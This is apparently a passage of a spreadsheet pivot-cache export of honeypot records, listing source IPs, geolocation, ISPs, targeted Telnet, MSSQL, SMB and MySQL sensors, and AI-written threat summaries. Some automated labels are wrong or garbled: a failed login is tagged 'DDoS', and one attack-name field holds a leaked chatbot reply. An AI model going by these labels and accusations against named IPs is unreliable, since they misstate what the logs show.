    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67bf:6d09"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The attackers are attempting to scan and gather information about the services available on the targeted system, likely for reconnaissance purposes. They are also trying to brute-force passwords, exploit vulnerabilities, and inject malicious payloads into the systems. &amp;&amp; This indicates a failed login attempt to an MSSQL server, suggesting a possible brute-force attack or unauthorized access attempt. The absence of any other information makes it unclear whether this was a legitimate mistake or malicious activity. This could be the first step in a larger attack on the system."/>
    <s v="DDoS"/>
  </r>
  <r>
    <x v="422"/>
    <x v="422"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T15:00:23"/>
    <d v="2025-04-29T14:59:18"/>
    <d v="2025-04-29T15:00:23"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MYSQL_HC1"/>
    <s v="3306"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="70"/>
    <s v="Vĩnh Phúc Province"/>
    <s v="Lập Thạch District"/>
    <s v="Lập Thạch"/>
    <s v="8310244"/>
    <s v="NA"/>
    <s v="21.4154"/>
    <s v="105.461"/>
    <s v="18403"/>
    <s v="FPT Telecom Company"/>
    <s v="FPT Telecom Company"/>
    <s v="business"/>
    <s v="Vietnam Internet Network Information Center"/>
    <s v="2005-07-14"/>
    <s v="FPTDYNAMICIP-NET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:3abb:4cec"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="423"/>
    <x v="423"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T14:50:19"/>
    <d v="2025-04-23T13:06:31"/>
    <d v="2025-04-29T14:50:19"/>
    <n v="4"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_H43&amp;&amp;SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="OD"/>
    <s v="Odisha"/>
    <s v="Khordha"/>
    <s v="Bhubaneswar"/>
    <s v="1275817"/>
    <s v="NA"/>
    <s v="20.2724"/>
    <s v="85.8338"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="cellular"/>
    <s v="Bharti Airtel Ltd."/>
    <s v="2011-03-17"/>
    <s v="NOIDA-DELHI-NCR"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6ad7:9796"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="424"/>
    <x v="424"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T14:49:28"/>
    <d v="2025-01-21T16:35:28"/>
    <d v="2025-04-29T14:49:28"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1"/>
    <s v="1433"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="OD"/>
    <s v="Odisha"/>
    <s v="Kendujhar"/>
    <s v="Barbil"/>
    <s v="7279597"/>
    <s v="758035"/>
    <s v="22.1148"/>
    <s v="85.3861"/>
    <s v="134880"/>
    <s v="Flix Broadband Services Private Limited"/>
    <s v="LS CABLE NETWORK"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2022-05-19"/>
    <s v="FLIXNETOD"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:67bb:e675"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="425"/>
    <x v="425"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T14:45:08"/>
    <d v="2025-04-29T13:54:46"/>
    <d v="2025-04-29T14:45:08"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H9"/>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2007-08-01"/>
    <s v="BB-Multiplay"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75c2:f377"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="426"/>
    <x v="426"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T14:44:34"/>
    <d v="2025-04-29T14:44:34"/>
    <d v="2025-04-29T14:44:34"/>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c:ebb8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="427"/>
    <x v="427"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T14:37:58"/>
    <d v="2025-04-29T14:37:58"/>
    <d v="2025-04-29T14:37:58"/>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d6:8a47"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="428"/>
    <x v="428"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T14:14:10"/>
    <d v="2025-04-29T14:14:10"/>
    <d v="2025-04-29T14:14:10"/>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2:bbbb"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="429"/>
    <x v="429"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T14:10:47"/>
    <d v="2023-07-27T21:18:52"/>
    <d v="2025-04-29T14:10:47"/>
    <n v="220"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;abuseipdb&amp;&amp;SMA-LAB_SMB_H35&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_SMB_H18&amp;&amp;SMA-LAB_MSSQL_H27&amp;&amp;SMA-LAB_SMB_H16&amp;&amp;SMA-LAB_MSSQL_H30&amp;&amp;SMA-LAB_SMB_H2&amp;&amp;SMA-LAB_SMB_H19&amp;&amp;SMA-LAB_SMB_H8&amp;&amp;SMA-LAB_SMB_H3&amp;&amp;SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_MSSQL_H34&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_SMB_H40&amp;&amp;SMA-LAB_MSSQL_H25&amp;&amp;SMA-LAB_SMB_H21&amp;&amp;SMA-LAB_MSSQL_H31&amp;&amp;SMA-LAB_SMB_H47"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;NA&amp;&amp;445&amp;&amp;445&amp;&amp;3007"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="HR"/>
    <s v="Haryana"/>
    <s v="Gurugram"/>
    <s v="Gurugram (Sector 44)"/>
    <s v="1270642"/>
    <s v="NA"/>
    <s v="28.4498"/>
    <s v="77.0761"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="business"/>
    <s v="Shri Vishnu Engineering College for Women Autonomous"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,54426)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,61398)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,61465)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,62054)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,64161)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,65284)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,65334)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,53089)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,53461)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,57029)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,57122)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,58702)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,58788)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,57124)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,57277)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,58728)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,49304)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,51473)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,63654)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,61823)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,61826)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,60213)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,64886)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,50307)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,61018)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,56438)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,60275)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,63927)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,50519)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,50146)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,55222)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,55316)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,61324)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,60573)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,49943)}&amp;&amp;{Data_SMB:User  authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,63548)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,63549)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,58528)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,65016)}&amp;&amp;{Data_SMB:Incoming connection (112.133.222.158,56136)}&amp;&amp;{Data_SMB:User . authenticated successfully (basic)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7085:de9e"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="430"/>
    <x v="430"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T14:10:13"/>
    <d v="2025-01-20T11:50:00"/>
    <d v="2025-04-29T14:10:13"/>
    <n v="13"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="Caieiras"/>
    <s v="Caieiras"/>
    <s v="3468215"/>
    <s v="NA"/>
    <s v="-23.3642"/>
    <s v="-46.7406"/>
    <s v="270270"/>
    <s v="Gama Telecom"/>
    <s v="Gama Telecom"/>
    <s v="business"/>
    <s v="Gama Telecom"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:c87b:ee59"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="431"/>
    <x v="431"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T14:09:12"/>
    <d v="2025-04-29T14:09:12"/>
    <d v="2025-04-29T14:09:12"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>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e:3939"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="432"/>
    <x v="432"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T14:09:10"/>
    <d v="2025-03-15T00:05:01"/>
    <d v="2025-04-29T14:09:10"/>
    <n v="15"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="RJ"/>
    <s v="Rio de Janeiro"/>
    <s v="Duque de Caxias"/>
    <s v="Vila Sarapui"/>
    <s v="12420851"/>
    <s v="NA"/>
    <s v="-22.7518"/>
    <s v="-43.2988"/>
    <s v="269409"/>
    <s v="Rio Online Telecomunicações e Informática Ltda Me"/>
    <s v="Rio Online Telecomunicações e Informática Ltda Me"/>
    <s v="business"/>
    <s v="Rio Online Telecomunicações e Informática Ltda Me"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2dba:27ad"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="433"/>
    <x v="433"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T13:55:13"/>
    <d v="2024-05-29T09:33:50"/>
    <d v="2025-04-29T13:55:13"/>
    <n v="106"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Incomming Traffic&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_DNS_H44&amp;&amp;SMA-LAB_MT-CPA_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H24"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;53&amp;&amp;29772&amp;&amp;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2007-08-01"/>
    <s v="BB-Multiplay-General"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:75d8:d13e"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="434"/>
    <x v="434"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T13:54:23"/>
    <d v="2025-04-29T13:54:23"/>
    <d v="2025-04-29T13:54:23"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="VE"/>
    <s v="Venezuela"/>
    <s v="V"/>
    <s v="Zulia"/>
    <s v="Sucrev Municipality"/>
    <s v="Caja Seca"/>
    <s v="3647462"/>
    <s v="NA"/>
    <s v="9.14151"/>
    <s v="-71.0674"/>
    <s v="271907"/>
    <s v="AS271907"/>
    <s v="Colnetwork C.A."/>
    <s v="corporate"/>
    <s v="Colnetwork C.A"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ce00:b5b8"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="435"/>
    <x v="435"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T13:47:03"/>
    <d v="2025-04-29T13:47:03"/>
    <d v="2025-04-29T13:47:03"/>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3d03:da8a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="436"/>
    <x v="436"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T13:13:24"/>
    <d v="2024-07-11T18:13:00"/>
    <d v="2025-04-29T13:13:24"/>
    <n v="364"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H21&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H36&amp;&amp;SMA-LAB_SMB_H36&amp;&amp;SMA-LAB_MSSQL_H33"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;1433&amp;&amp;445"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="ID"/>
    <s v="Indonesia"/>
    <s v="JT"/>
    <s v="Central Java"/>
    <s v="Kabupaten Wonosobo"/>
    <s v="Sambek"/>
    <s v="6405081"/>
    <s v="NA"/>
    <s v="-7.36405"/>
    <s v="109.899"/>
    <s v="141053"/>
    <s v="Pemerintah Kabupaten Wonosobo"/>
    <s v="Pemerintah Kabupaten Wonosobo"/>
    <s v="business"/>
    <s v="Pemerintah Kabupaten Wonosobo"/>
    <s v="2020-09-04"/>
    <s v="IDNIC-WONOSOBOKAB-ID"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (103.155.105.105,63016)}&amp;&amp;{Data_SMB:Incoming connection (103.155.105.105,50812)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:679b:6969"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="An incoming network connection from IP address 103.155.105.105 to a service on port 50812 may indicate an attempt to exploit a vulnerable service or initiate unauthorized access. This could be related to scanning for open ports or attempting to gain unauthorized access to the targeted system. Further investigation is required to determine the intent behind this activity. &amp;&amp; A suspicious incoming connection from an external IP address has been detected to a SMB service, indicating potential unauthorized access attempts to shared resources or data on the network. This could be related to malware or ransomware infections or even brute-force login attempts. The source IP address (103.155.105.105) may be associated with malicious activity."/>
    <s v="SMB Attack &amp;&amp; Port Scanner"/>
  </r>
  <r>
    <x v="437"/>
    <x v="437"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T13:10:31"/>
    <d v="2023-12-06T00:44:00"/>
    <d v="2025-04-29T13:10:31"/>
    <n v="280"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_MT-CPA_H13&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H7"/>
    <s v="23&amp;&amp;28711&amp;&amp;NA&amp;&amp;19165"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="UP"/>
    <s v="Uttar Pradesh"/>
    <s v="Ghazipur"/>
    <s v="Muhammadābād"/>
    <s v="1262626"/>
    <s v="NA"/>
    <s v="25.6191"/>
    <s v="83.7558"/>
    <s v="24186"/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="RailTel Corporation of India Ltd."/>
    <s v="business"/>
    <s v="RailTel Corporation"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6742:4884"/>
    <s v="None&amp;&amp;C-I&amp;&amp;C-U"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="There is no data provided for analysis. &amp;&amp; The data suggests an attempt to connect to a service using TELNET protocol but was unsuccessful as indicated by the value of NA for Data_TELNET, implying no malicious activity was detected or logged due to this attempt. The lack of data indicates that the attempt was likely blocked or failed. This might be a probing or reconnaissance attempt. &amp;&amp; No available log data provided, unable to analyze activity. &amp;&amp; No log data provided, unable to analyze or describe any malicious activity."/>
    <s v="Telnet Scanning &amp;&amp; I'd be happy to help you analyze the log data! However, I don't see any log data provided. Please paste the log data for me to analyze and I'll provide the names of the attacks in a short phrase (max 2 words)."/>
  </r>
  <r>
    <x v="438"/>
    <x v="438"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-29T12:58:28"/>
    <d v="2024-12-09T05:02:30"/>
    <d v="2025-04-29T12:58:28"/>
    <n v="3"/>
    <s v="SQTK_GTDN"/>
    <s v="HoneyPot BlackListed IP&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
